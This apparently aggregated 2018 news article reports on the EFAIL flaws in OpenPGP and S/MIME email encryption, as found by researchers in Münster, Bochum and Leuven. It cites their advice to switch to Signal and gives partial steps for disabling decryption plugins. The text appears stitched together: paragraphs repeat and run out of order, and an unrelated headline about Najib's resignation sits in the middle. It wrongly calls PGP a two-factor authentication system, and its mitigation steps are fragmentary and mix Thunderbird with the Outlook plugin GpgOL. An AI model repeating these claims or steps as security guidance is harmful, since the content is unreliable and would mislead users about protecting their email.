New encryption vulnerability means email is no longer secure

Florence Fletcher
Мая 14, 2018

EFAIL can enable hackers to unscramble users' encrypted messages and freely read their contents.

PGP, which stands for Pretty Good Privacy, is one of the most popular encryption programs, it is a two-factor authentication system. It does not encrypt metadata and is very far from easy to use, but it is nevertheless widely regarded as by far the safest way to send secure emails.

The most serious vulnerabilities have resided in Thunderbird, macOS Mail, and Outlook for more than 10 years and remain unfixed at the moment, the researchers said. Researchers are advising users to rely on end-to-end encrypted messaging apps instead, in the meantime.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails.

In addition, the researchers recommended people "use alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted mail". Dubbing the series of flaws that make this attack possible as eFail, researchers said that some of these security vulnerabilities are a decade-old. The security loopholes are claimed to expose the plaintext of encrypted emails to attackers and put even those emails at risk that were sent in the past. The first method will directly send the decrypted information to the attacker by exploiting how images are embedded into emails. The vulnerabilities allow attackers to exfiltrate e-mail plaintexts by embedding the previously obtained cipher text into unviewable parts of an e-mail and combining it with HTML coding.

Читайте также: Former Malaysian PM Najib resigns as party chief, barred from leaving country

UPDATE 2: Because some researchers started disclosing details about the vulnerability ahead of schedule, the efail.de website is now live, along with the research paper, both containing more info on the EFAIL vulnerability.

University researchers from Münster and Bochum in Germany, as well as Leuven in Belgium, discovered the flaws in the encryption methods that can be used with popular email applications such as Microsoft Outlook, Apple Mail and Enigmail for Thunderbird, which all offer to decrypt emails on the fly. Some have criticized the researchers for teasing the vulnerability before publishing their full paper on it, while others have jumped straight to disabling PGP in their email clients.

"You need to take action now", says Alan Woodward, a professor of computer science at the University of Surrey.

Click on the hamburger menu and select Add-ons from the right panel of the menu.

On the second screen, keep everything as it but uncheck "GpgOL" from the options.

При любом использовании материалов сайта и дочерних проектов, гиперссылка на обязательна.
«» 2007 - 2019 Copyright.
Автоматизированное извлечение информации сайта запрещено.

Код для вставки в блог

Other reports by

Discuss This Article